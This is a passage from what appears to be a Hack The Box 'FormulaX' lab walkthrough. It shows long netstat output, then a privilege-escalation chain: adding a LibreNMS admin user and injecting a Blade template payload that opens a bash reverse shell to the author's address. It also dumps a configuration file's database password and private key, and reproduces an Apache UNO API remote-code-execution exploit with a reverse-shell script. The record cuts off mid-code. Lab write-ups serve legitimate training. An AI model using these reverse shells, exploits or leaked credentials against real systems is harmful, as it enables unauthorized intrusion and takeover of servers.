tcp 0 0 127.0.0.1:40698 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51112 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55268 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43770 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:36134 127.0.0.1:80 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:55828 TIME_WAIT
tcp 0 0 127.0.0.1:45926 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46030 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55280 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45992 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55080 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:36849 127.0.0.1:48886 TIME_WAIT
tcp 0 0 127.0.0.1:51172 127.0.0.1:8082 TIME_WAIT
tcp6 0 0 :::22 :::* LISTEN
netstat: no support for `AF INET (sctp)' on this system.
netstat: no support for `AF INET (sctp)' on this system.
udp 0 0 10.10.11.6:54519 8.8.8.8:53 ESTABLISHED
udp 0 0 10.10.11.6:44675 8.8.8.8:53 ESTABLISHED
udp 0 0 127.0.0.53:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 0.0.0.0:162 0.0.0.0:*
udp 0 0 127.0.0.1:51518 127.0.0.53:53 ESTABLISHED
udp6 0 0 :::162 :::*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 5858269 /run/user/1002/systemd/notif
HTB_FormulaX 21
y
unix 2 [ ACC ] STREAM LISTENING 5858272 /run/user/1002/systemd/priva
te
unix 2 [ ACC ] STREAM LISTENING 5858278 /run/user/1002/bus
unix 2 [ ACC ] STREAM LISTENING 5858280 /run/user/1002/gnupg/S.dirmn
gr
unix 2 [ ACC ] STREAM LISTENING 38360 /home/kai_relay/.pm2/pub.soc
k
unix 2 [ ACC ] STREAM LISTENING 5858282 /run/user/1002/gnupg/S.gpg-a
gent.browser
unix 2 [ ACC ] STREAM LISTENING 28358 @/org/kernel/linux/storage/m
ultipathd
unix 2 [ ACC ] STREAM LISTENING 5858284 /run/user/1002/gnupg/S.gpg-a
gent.extra
unix 2 [ ACC ] STREAM LISTENING 5858286 /run/user/1002/gnupg/S.gpg-a
gent.ssh
unix 2 [ ACC ] STREAM LISTENING 5858288 /run/user/1002/gnupg/S.gpg-a
gent
unix 2 [ ACC ] STREAM LISTENING 38361 /home/kai_relay/.pm2/rpc.soc
k
unix 2 [ ACC ] STREAM LISTENING 34499 /tmp/mongodb-27017.sock
unix 3 [ ] DGRAM CONNECTED 28342 /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 28345 /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 28347 /run/systemd/userdb/io.syste
md.DynamicUser
unix 2 [ ACC ] STREAM LISTENING 28348 /run/systemd/io.system.Manag
edOOM
unix 2 [ ACC ] STREAM LISTENING 28356 /run/lvm/lvmpolld.socket
unix 2 [ ACC ] STREAM LISTENING 28359 /run/systemd/fsck.progress
unix 10 [ ] DGRAM CONNECTED 28366 /run/systemd/journal/dev-log
unix 9 [ ] DGRAM CONNECTED 28368 /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 28370 /run/systemd/journal/stdout
unix 2 [ ACC ] SEQPACKET LISTENING 28373 /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 33199 /run/php-fpm-librenms.sock
unix 2 [ ACC ] STREAM LISTENING 33201 /run/php/php8.1-fpm.sock
unix 2 [ ACC ] STREAM LISTENING 38357 /var/www/.pm2/pub.sock
unix 2 [ ACC ] STREAM LISTENING 33537 /run/mysqld/mysqld.sock
unix 2 [ ACC ] STREAM LISTENING 27522 /run/systemd/journal/io.syst
emd.journal
unix 3 [ ] SEQPACKET CONNECTED 39854 @0000f
unix 2 [ ACC ] STREAM LISTENING 38358 /var/www/.pm2/rpc.sock
unix 2 [ ACC ] STREAM LISTENING 32055 @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ACC ] STREAM LISTENING 30239 /run/systemd/resolve/io.syst
emd.Resolve
unix 2 [ ACC ] STREAM LISTENING 32043 /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 32056 /run/lxd-installer.socket
unix 2 [ ACC ] STREAM LISTENING 32288 /var/run/vmware/guestService
Pipe
unix 3 [ ] SEQPACKET CONNECTED 5866406 @00134
unix 3 [ ] SEQPACKET CONNECTED 5866404 @00133
HTB_FormulaX 22
unix 3 [ ] SEQPACKET CONNECTED 39859 @00010
unix 3 [ ] STREAM CONNECTED 33083 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866440
unix 3 [ ] STREAM CONNECTED 39908
unix 3 [ ] STREAM CONNECTED 32971
unix 3 [ ] STREAM CONNECTED 40071
unix 3 [ ] STREAM CONNECTED 30080
unix 3 [ ] STREAM CONNECTED 38511
unix 3 [ ] STREAM CONNECTED 5866894
unix 3 [ ] STREAM CONNECTED 32783
unix 3 [ ] STREAM CONNECTED 38512
unix 3 [ ] STREAM CONNECTED 5866466
unix 3 [ ] SEQPACKET CONNECTED 5866401
unix 3 [ ] STREAM CONNECTED 5858274
unix 2 [ ] DGRAM 34228
unix 3 [ ] STREAM CONNECTED 29731 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 32979 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5809896
unix 3 [ ] STREAM CONNECTED 39918
unix 3 [ ] STREAM CONNECTED 40029
unix 2 [ ] DGRAM 31930
unix 3 [ ] STREAM CONNECTED 5866821
unix 2 [ ] DGRAM CONNECTED 39830
unix 3 [ ] STREAM CONNECTED 30068
unix 3 [ ] STREAM CONNECTED 39876
unix 2 [ ] DGRAM CONNECTED 32401
unix 3 [ ] STREAM CONNECTED 5859378
unix 2 [ ] STREAM CONNECTED 37757
unix 3 [ ] STREAM CONNECTED 38516
unix 3 [ ] STREAM CONNECTED 38527
unix 3 [ ] STREAM CONNECTED 5809895
unix 3 [ ] STREAM CONNECTED 39922
unix 3 [ ] STREAM CONNECTED 39881
unix 3 [ ] STREAM CONNECTED 39347
unix 3 [ ] STREAM CONNECTED 34198
unix 2 [ ] STREAM CONNECTED 5858975
unix 3 [ ] STREAM CONNECTED 39446
unix 2 [ ] DGRAM CONNECTED 30082
unix 2 [ ] DGRAM CONNECTED 31821
unix 3 [ ] STREAM CONNECTED 39955
unix 3 [ ] STREAM CONNECTED 5866919
unix 3 [ ] STREAM CONNECTED 32782
unix 3 [ ] STREAM CONNECTED 32053
unix 3 [ ] STREAM CONNECTED 30095
unix 3 [ ] STREAM CONNECTED 887153
unix 3 [ ] STREAM CONNECTED 38525
unix 3 [ ] STREAM CONNECTED 30617 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866460
unix 3 [ ] STREAM CONNECTED 5866839 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 39882
HTB_FormulaX 23
unix 3 [ ] STREAM CONNECTED 39931
unix 3 [ ] STREAM CONNECTED 40083
unix 3 [ ] STREAM CONNECTED 39345
unix 3 [ ] STREAM CONNECTED 33192 /run/systemd/journal/stdout
unix 3 [ ] DGRAM CONNECTED 31829
unix 3 [ ] STREAM CONNECTED 5866853
unix 3 [ ] STREAM CONNECTED 39444
unix 3 [ ] STREAM CONNECTED 38521
unix 3 [ ] STREAM CONNECTED 32445 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 32054
unix 3 [ ] STREAM CONNECTED 30186
unix 3 [ ] STREAM CONNECTED 38526
unix 3 [ ] STREAM CONNECTED 5866462
unix 3 [ ] STREAM CONNECTED 32285 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 39957
unix 3 [ ] STREAM CONNECTED 5866815
unix 3 [ ] STREAM CONNECTED 39448
unix 3 [ ] DGRAM CONNECTED 28640
unix 3 [ ] STREAM CONNECTED 31603
unix 3 [ ] STREAM CONNECTED 39351
unix 3 [ ] STREAM CONNECTED 5866437
unix 3 [ ] STREAM CONNECTED 39929
unix 3 [ ] STREAM CONNECTED 38510
unix 3 [ ] STREAM CONNECTED 38514
unix 3 [ ] STREAM CONNECTED 5866480
unix 3 [ ] DGRAM CONNECTED 28343
unix 3 [ ] STREAM CONNECTED 5859303 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 39877
unix 2 [ ] DGRAM CONNECTED 32933
unix 3 [ ] STREAM CONNECTED 39956
unix 3 [ ] STREAM CONNECTED 30606
unix 3 [ ] STREAM CONNECTED 5866824
unix 3 [ ] SEQPACKET CONNECTED 39852
unix 3 [ ] STREAM CONNECTED 28584
unix 3 [ ] STREAM CONNECTED 39349
unix 3 [ ] STREAM CONNECTED 27624
unix 3 [ ] STREAM CONNECTED 32976
unix 3 [ ] STREAM CONNECTED 5866433
unix 3 [ ] STREAM CONNECTED 39928
unix 3 [ ] STREAM CONNECTED 886729
unix 3 [ ] STREAM CONNECTED 30595 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 887152
unix 3 [ ] STREAM CONNECTED 38524
unix 2 [ ] DGRAM CONNECTED 30225
unix 3 [ ] STREAM CONNECTED 5859379
unix 3 [ ] STREAM CONNECTED 5866837 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 30083
unix 3 [ ] STREAM CONNECTED 39958
unix 3 [ ] STREAM CONNECTED 39925
unix 3 [ ] STREAM CONNECTED 39879
HTB_FormulaX 24
unix 2 [ ] STREAM CONNECTED 36162
unix 2 [ ] DGRAM 33259
unix 3 [ ] STREAM CONNECTED 5866395
unix 3 [ ] DGRAM CONNECTED 5858271
unix 3 [ ] STREAM CONNECTED 38513
unix 3 [ ] STREAM CONNECTED 5866493
unix 3 [ ] DGRAM CONNECTED 28344
unix 3 [ ] STREAM CONNECTED 5866920
unix 3 [ ] STREAM CONNECTED 5866458
unix 3 [ ] STREAM CONNECTED 41049
unix 3 [ ] STREAM CONNECTED 32417 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 5866822
unix 3 [ ] SEQPACKET CONNECTED 39860
unix 3 [ ] STREAM CONNECTED 30081
unix 3 [ ] STREAM CONNECTED 5859267 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33162
unix 3 [ ] SEQPACKET CONNECTED 5866405
unix 3 [ ] STREAM CONNECTED 40082
unix 3 [ ] STREAM CONNECTED 39346
unix 3 [ ] STREAM CONNECTED 29721 /run/systemd/journal/stdout
unix 2 [ ] DGRAM CONNECTED 5858209
unix 3 [ ] STREAM CONNECTED 887000
unix 3 [ ] STREAM CONNECTED 5866491
unix 2 [ ] DGRAM CONNECTED 32279
unix 3 [ ] STREAM CONNECTED 5866893
unix 3 [ ] STREAM CONNECTED 32416
unix 3 [ ] STREAM CONNECTED 32282 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33159
unix 3 [ ] STREAM CONNECTED 32284 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 5864974 /run/php-fpm-librenms.sock
unix 3 [ ] STREAM CONNECTED 5866463
unix 3 [ ] STREAM CONNECTED 886998
unix 3 [ ] STREAM CONNECTED 38523
unix 3 [ ] STREAM CONNECTED 5866432
unix 2 [ ] DGRAM CONNECTED 27524
unix 3 [ ] STREAM CONNECTED 5809898
unix 3 [ ] STREAM CONNECTED 39909
unix 3 [ ] STREAM CONNECTED 33198
unix 2 [ ] DGRAM CONNECTED 5858245
unix 3 [ ] STREAM CONNECTED 5866843
unix 3 [ ] STREAM CONNECTED 39451
unix 2 [ ] DGRAM CONNECTED 28546
unix 3 [ ] DGRAM CONNECTED 31826
unix 3 [ ] STREAM CONNECTED 33160
unix 2 [ ] DGRAM CONNECTED 30207
unix 3 [ ] STREAM CONNECTED 32925 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866465
unix 3 [ ] STREAM CONNECTED 32281
unix 3 [ ] SEQPACKET CONNECTED 5866402
unix 3 [ ] STREAM CONNECTED 886936
HTB_FormulaX 25
unix 3 [ ] STREAM CONNECTED 40072
unix 3 [ ] STREAM CONNECTED 34147
unix 3 [ ] STREAM CONNECTED 32972 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5809894
unix 3 [ ] STREAM CONNECTED 39917
unix 2 [ ] DGRAM CONNECTED 5858255
unix 3 [ ] DGRAM CONNECTED 31827
unix 3 [ ] STREAM CONNECTED 5866816
unix 3 [ ] STREAM CONNECTED 30084
unix 3 [ ] STREAM CONNECTED 39932
unix 3 [ ] STREAM CONNECTED 32924
unix 3 [ ] STREAM CONNECTED 30115 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866393
unix 3 [ ] STREAM CONNECTED 32236
unix 3 [ ] STREAM CONNECTED 5866488
unix 3 [ ] STREAM CONNECTED 5866441
unix 3 [ ] STREAM CONNECTED 39344
unix 2 [ ] DGRAM 33228
unix 3 [ ] STREAM CONNECTED 5866854
unix 3 [ ] STREAM CONNECTED 39870
unix 3 [ ] STREAM CONNECTED 39445
unix 3 [ ] DGRAM CONNECTED 27641
unix 3 [ ] STREAM CONNECTED 5858230
unix 3 [ ] STREAM CONNECTED 5866856
unix 3 [ ] STREAM CONNECTED 33161
unix 3 [ ] STREAM CONNECTED 30204 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866394
unix 3 [ ] STREAM CONNECTED 886937
unix 3 [ ] STREAM CONNECTED 5866489
unix 3 [ ] STREAM CONNECTED 32280
unix 3 [ ] STREAM CONNECTED 5866494
unix 3 [ ] STREAM CONNECTED 5809897
unix 2 [ ] DGRAM 34227
unix 3 [ ] DGRAM CONNECTED 27640
unix 3 [ ] STREAM CONNECTED 30203 /run/systemd/journal/stdout
unix 3 [ ] SEQPACKET CONNECTED 39855
unix 3 [ ] STREAM CONNECTED 30079 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 40023
unix 3 [ ] STREAM CONNECTED 38515
unix 3 [ ] STREAM CONNECTED 886728
unix 3 [ ] DGRAM CONNECTED 5858270
unix 3 [ ] STREAM CONNECTED 38522
unix 3 [ ] STREAM CONNECTED 30284
unix 3 [ ] STREAM CONNECTED 32283 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 5866949
unix 3 [ ] STREAM CONNECTED 40021
unix 3 [ ] STREAM CONNECTED 5866844
unix 3 [ ] SEQPACKET CONNECTED 39851
unix 2 [ ] DGRAM CONNECTED 28633
unix 3 [ ] STREAM CONNECTED 5866431
HTB_FormulaX 26
unix 3 [ ] STREAM CONNECTED 39350
unix 2 [ ] DGRAM CONNECTED 27636
unix 3 [ ] STREAM CONNECTED 5866438
unix 3 [ ] STREAM CONNECTED 39900
unix 3 [ ] STREAM CONNECTED 5866459
unix 3 [ ] STREAM CONNECTED 32242
unix 3 [ ] STREAM CONNECTED 887001
unix 3 [ ] STREAM CONNECTED 38528
unix 2 [ ] DGRAM 33260
unix 3 [ ] DGRAM CONNECTED 28643
unix 3 [ ] STREAM CONNECTED 5867521 /run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 32780
unix 3 [ ] STREAM CONNECTED 40020
unix 2 [ ] DGRAM CONNECTED 29089
unix 3 [ ] STREAM CONNECTED 5866855
unix 3 [ ] STREAM CONNECTED 39447
unix 3 [ ] STREAM CONNECTED 29733 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 39348
unix 3 [ ] STREAM CONNECTED 5866450
unix 3 [ ] STREAM CONNECTED 39899
unix 3 [ ] STREAM CONNECTED 886997
unix 3 [ ] STREAM CONNECTED 5866481
unix 3 [ ] SEQPACKET CONNECTED 5866407
unix 3 [ ] STREAM CONNECTED 5866457
unix 3 [ ] STREAM CONNECTED 41048
unix 3 [ ] DGRAM CONNECTED 28641
unix 3 [ ] STREAM CONNECTED 5866819
unix 3 [ ] STREAM CONNECTED 39871
unix 3 [ ] STREAM CONNECTED 39449
unix 3 [ ] DGRAM CONNECTED 31828
unix 3 [ ] STREAM CONNECTED 40028
unix 3 [ ] STREAM CONNECTED 5809899
unix 3 [ ] STREAM CONNECTED 39921
unix 3 [ ] STREAM CONNECTED 40025 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 38509
unix 3 [ ] STREAM CONNECTED 5866392
unix 3 [ ] STREAM CONNECTED 5866490
unix 2 [ ] DGRAM 33227
unix 3 [ ] STREAM CONNECTED 32298
unix 3 [ ] STREAM CONNECTED 5866950
unix 3 [ ] DGRAM CONNECTED 28642
unix 3 [ ] STREAM CONNECTED 30609 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866818
unix 3 [ ] STREAM CONNECTED 39450
unix 3 [ ] STREAM CONNECTED 40024 /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33197
unix 3 [ ] STREAM CONNECTED 5866451
unix 3 [ ] STREAM CONNECTED 39926
unix 3 [ ] STREAM CONNECTED 27610
netstat: no support for `AF IPX' on this system.
HTB_FormulaX 27
netstat: no support for `AF AX25' on this system.
netstat: no support for `AF X25' on this system.
netstat: no support for `AF NETROM' on this system.
netstat: no support for `AF ROSE' on this system.
<title>Redirecting to http://127.0.0.1:3000/login</title>
</head>
<body>
Redirecting to <a href="http://127.0.0.1:3000/login">http://127.0.0.1:3000/logi
n</a>.
</body>
</html>
frank_dorky@formulax:~$ cd /opt/librenms
frank_dorky@formulax:/opt/librenms$ ls -l adduser.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
HTB_FormulaX 28
frank_dorky@formulax:/opt/librenms$ ./adduser.php test test 10
User test added successfully
We get to the control panel. So that we can create our own templates, we need to fix the
error in Webserver
HTB_FormulaX 29
Enter php as given below
@php
system("bash -c '/bin/bash -i >& /dev/tcp/10.10.14.68/5550 0>&1'");
@endphp
HTB_FormulaX 30
We got a reverse connection
librenms@formulax:~$ ls -la
total 5216
drwxrwx--x 27 librenms librenms 4096 Feb 19 13:33 .
drwxr-xr-x 3 root root 4096 Feb 16 15:21 ..
lrwxrwxrwx 1 root root 9 Feb 19 13:33 .bash_history -> /dev/null
drwxrwxr-x 4 librenms librenms 4096 Feb 16 15:21 .cache
-rw-r--r-- 1 librenms librenms 815 Oct 18 2022 .codeclimate.yml
drwxrwxr-x 3 librenms librenms 4096 Feb 16 15:21 .config
-rw-rw-r-- 1 librenms librenms 353 Sep 7 2023 .custom.env
HTB_FormulaX 31
-rw-r--r-- 1 librenms librenms 258 Oct 18 2022 .editorconfig
-rw-r--r-- 1 librenms librenms 73 Oct 18 2022 .env.example
-rw-r--r-- 1 librenms librenms 197 Oct 18 2022 .env.travis
-rw-r--r-- 1 librenms librenms 858 Oct 18 2022 .git-blame-ignore-revs
drwxr-xr-x 4 librenms librenms 4096 Oct 18 2022 .github
-rw-r--r-- 1 librenms librenms 637 Oct 18 2022 .gitignore
drwxrwxr-x 4 librenms librenms 4096 Feb 16 15:21 .local
-rw-r--r-- 1 librenms librenms 5434 Oct 18 2022 .php-cs-fixer.php
-rw------- 1 librenms librenms 1024 Feb 16 15:53 .rnd
-rw-r--r-- 1 librenms librenms 182 Oct 18 2022 .scrutinizer.yml
-rw-r--r-- 1 librenms librenms 103 Oct 18 2022 .styleci.yml
-rw-r--r-- 1 librenms librenms 11411 Oct 18 2022 AUTHORS.md
-rw-r--r-- 1 librenms librenms 94 Oct 18 2022 CHANGELOG.md
-rw-r--r-- 1 librenms librenms 93 Oct 18 2022 CODE_OF_CONDUCT.md
-rw-r--r-- 1 librenms librenms 170 Oct 18 2022 CONTRIBUTING.md
-rw-r--r-- 1 librenms librenms 35337 Oct 18 2022 LICENSE.txt
drwxr-xr-x 20 librenms librenms 4096 Feb 16 15:40 LibreNMS
-rw-r--r-- 1 librenms librenms 10040 Oct 18 2022 README.md
-rw-r--r-- 1 librenms librenms 1189 Oct 18 2022 SECURITY.md
-rwxr-xr-x 1 librenms librenms 7518 Oct 18 2022 addhost.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
-rwxr-xr-x 1 librenms librenms 1827 Oct 18 2022 alerts.php
drwxr-xr-x 22 librenms librenms 4096 Oct 18 2022 app
-rwxr-xr-x 1 librenms librenms 1686 Oct 18 2022 artisan
-rwxr-xr-x 1 librenms librenms 6534 Oct 18 2022 billing-calculate.php
drwxr-xr-x 3 librenms librenms 4096 Feb 16 15:51 bootstrap
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 cache
-rwxr-xr-x 1 librenms librenms 3334 Oct 18 2022 check-services.php
-rw-r--r-- 1 librenms librenms 5414 Oct 18 2022 composer.json
-rw-r--r-- 1 librenms librenms 457017 Oct 18 2022 composer.lock
-rwxr-xr-x 1 librenms librenms 2975214 Feb 16 15:21 composer.phar
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 config
-rw-r--r-- 1 librenms librenms 1702 Oct 18 2022 config.php.default
-rwxr-xr-x 1 librenms librenms 368 Oct 18 2022 config_to_json.php
-rwxr-xr-x 1 librenms librenms 880 Oct 18 2022 cronic
-rw-r--r-- 1 librenms librenms 14640 Oct 18 2022 daily.php
-rwxr-xr-x 1 librenms librenms 14962 Oct 18 2022 daily.sh
drwxr-xr-x 6 librenms librenms 4096 Oct 18 2022 database
-rwxr-xr-x 1 librenms librenms 517 Oct 18 2022 delhost.php
-rwxr-xr-x 1 librenms librenms 1877 Oct 18 2022 discovery-wrapper.py
-rwxr-xr-x 1 librenms librenms 4206 Oct 18 2022 discovery.php
-rwxr-xr-x 1 librenms librenms 2211 Oct 18 2022 dist-pollers.php
drwxr-xr-x 11 librenms librenms 4096 Oct 18 2022 doc
drwxr-xr-x 9 librenms librenms 4096 Oct 18 2022 html
drwxr-xr-x 9 librenms librenms 4096 Oct 18 2022 includes
-rwxr-xr-x 1 librenms librenms 976 Oct 18 2022 irc.php
-rwxr-xr-x 1 librenms librenms 2067 Oct 18 2022 librenms-service.py
-rw-r--r-- 1 librenms librenms 580 Oct 18 2022 librenms.cron
-rw-r--r-- 1 librenms librenms 1055 Oct 18 2022 librenms.nonroot.cron
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 licenses
HTB_FormulaX 32
-rwxr-xr-x 1 librenms librenms 1779 Oct 18 2022 lnms
drwxrwxr-x+ 2 librenms librenms 4096 Feb 16 15:21 logs
drwxr-xr-x 301 librenms librenms 20480 Oct 18 2022 mibs
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 misc
-rw-r--r-- 1 librenms librenms 10210 Oct 18 2022 mkdocs.yml
-rw-r--r-- 1 librenms librenms 793386 Oct 18 2022 package-lock.json
-rw-r--r-- 1 librenms librenms 1341 Oct 18 2022 package.json
-rwxr-xr-x 1 librenms librenms 3841 Oct 18 2022 pbin.sh
-rw-r--r-- 1 librenms librenms 171565 Oct 18 2022 phpstan-baseline-deprecated.neon
-rw-r--r-- 1 librenms librenms 422134 Oct 18 2022 phpstan-baseline.neon
-rw-r--r-- 1 librenms librenms 537 Oct 18 2022 phpstan-deprecated.neon
-rw-r--r-- 1 librenms librenms 838 Oct 18 2022 phpstan.neon
-rw-r--r-- 1 librenms librenms 1515 Oct 18 2022 phpunit.xml
-rwxr-xr-x 1 librenms librenms 749 Oct 18 2022 ping.php
-rwxr-xr-x 1 librenms librenms 7322 Oct 18 2022 poll-billing.php
-rwxr-xr-x 1 librenms librenms 1872 Oct 18 2022 poller-wrapper.py
-rwxr-xr-x 1 librenms librenms 5568 Oct 18 2022 poller.php
-rwxr-xr-x 1 librenms librenms 1064 Oct 18 2022 renamehost.php
-rw-r--r-- 1 librenms librenms 87 Oct 18 2022 requirements.txt
drwxr-xr-x 7 librenms librenms 4096 Oct 18 2022 resources
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 routes
drwxrwxr-x+ 2 librenms librenms 4096 Oct 18 2022 rrd
drwxr-xr-x 5 librenms librenms 4096 Oct 18 2022 scripts
-rw-r--r-- 1 librenms librenms 543 Oct 18 2022 server.php
-rwxr-xr-x 1 librenms librenms 1880 Oct 18 2022 services-wrapper.py
-rwxr-xr-x 1 librenms librenms 10194 Oct 18 2022 snmp-scan.py
-rw-r--r-- 1 librenms librenms 880 Oct 18 2022 snmpd.conf.example
-rwxr-xr-x 1 librenms librenms 538 Oct 18 2022 snmptrap.php
drwxr-xr-x 2 librenms librenms 12288 Oct 18 2022 sql-schema
drwxrwxr-x+ 6 librenms librenms 4096 Oct 18 2022 storage
-rwxr-xr-x 1 librenms librenms 523 Oct 18 2022 syslog.php
-rw-r--r-- 1 librenms librenms 776 Oct 18 2022 tailwind.config.js
drwxr-xr-x 10 librenms librenms 4096 Oct 18 2022 tests
-rwxr-xr-x 1 librenms librenms 5278 Oct 18 2022 validate.php
drwxrwxr-x 76 librenms librenms 4096 Feb 16 15:53 vendor
-rw-r--r-- 1 librenms librenms 709 Oct 18 2022 webpack.mix.js
DB_HOST=localhost
DB_DATABASE=librenms
DB_USERNAME=kai_relay
DB_PASSWORD=mychemicalformulaX
#APP_URL=
NODE_ID=648b260eb18d2
VAPID_PUBLIC_KEY=BDhe6thQfwA7elEUvyMPh9CEtrWZM1ySaMMIaB10DsIhGeQ8Iks8kL6uLtjMsHe61-ZCC6
HTB_FormulaX 33
f6XgPVt7O6liSqpvg
VAPID_PRIVATE_KEY=chr9zlPVQT8NsYgDGeVFda-AiD0UWIY6OW-jStiwmTQ
In this way, I successfully obtained the kai_relay user and logged in directly via ssh.
kai_relay@formulax:~$ sudo -l
Matching Defaults entries for kai_relay on forumlax:
env_reset, timestamp_timeout=0, mail_badpass, secure_path=/usr/local/sbin\:/usr/loc
al/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_reset,
timestamp_timeout=0
When sudo -l was checked we can notice access to office. lets exploit it by following
script
"""
# Exploit Title: Apache UNO API RCE
# Date: 2018-09-18
# Exploit Author: sud0woodo
# Vendor Homepage: https://www.apache.org/
# Software Link: https://www.openoffice.org/api/
# Version:
HTB_FormulaX 34
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
HackDefense advisory:
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
HackDefense blogpost:
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
This code represents a small proof of concept of an unauthenticted remote code executio
n using
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tes
ted
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-gener
ic.
For this PoC to work the target machine needs to run the ServiceManager using an extern
al
interface. The following command was used to test this PoC:
[Ubuntu]
Open a terminal and execute the following command:
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
The above command will start the LibreOffice ServiceManager but this can be executed wi
th the --invisible
flag to prevent the dialogbox from popping up on the target.
I also made a scanner available that can be used to check for the presence of the StarO
ffice manager running on a machine:
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-st
aroffice-managers/
"""
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
HTB_FormulaX 35
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecut
e")
shell_execute.execute("calc.exe", '',1)
#!/bin/bash
sh -i >& /dev/tcp/10.10.14.68/4444 0>&1
chmod +x /tmp/shell.sh
Now open another ssh terminal for kai_relay@formulax and execute the following code
Now come back to the kai_relay@formulax terminal create python file called exp.py
HTB_FormulaX 36
#
#HackDefense advisory:
#https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
#
#HackDefense blogpost:
#https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
#
#Unauthenticated RCE LibreOffice/OpenOffice with UNO API
#
#This code represents a small proof of concept of an unauthenticted remote code executi
on using
#the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been te
sted
#against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-gene
ric.
#
#For this PoC to work the target machine needs to run the ServiceManager using an exter
nal
#interface. The following command was used to test this PoC:
#
#[Ubuntu]
#Open a terminal and execute the following command:
# soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
#
#The above command will start the LibreOffice ServiceManager but this can be executed w
ith the --invisible
#flag to prevent the dialogbox from popping up on the target.
#
#I also made a scanner available that can be used to check for the presence of the Star
Office manager running on a machine:
#
#https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-s
taroffice-managers/
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )
HTB_FormulaX 37
# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
